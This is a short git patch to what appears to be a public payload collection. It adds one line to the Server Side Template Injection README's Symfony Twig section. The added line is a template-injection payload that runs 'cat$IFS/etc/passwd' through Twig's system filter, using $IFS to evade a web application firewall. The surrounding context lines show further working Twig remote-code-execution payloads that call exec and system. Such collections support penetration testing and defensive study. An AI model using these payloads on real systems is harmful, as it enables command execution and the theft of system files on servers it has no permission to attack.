From 38c273ff00da234058b477275826323af3429a58 Mon Sep 17 00:00:00 2001
From: SakiiR SakiiR <sakiirlessons@gmail.com>
Date: Sun, 29 Mar 2020 23:23:26 +0200
Subject: [PATCH] Added IFS (WAF bypass) to Symfony Twig RCE

---
 Server Side Template Injection/README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 9bf3241..9fc9ac5 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -159,6 +159,7 @@ $output = $twig > render (
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
 ```
 
 Example with an email passing FILTER_VALIDATE_EMAIL PHP.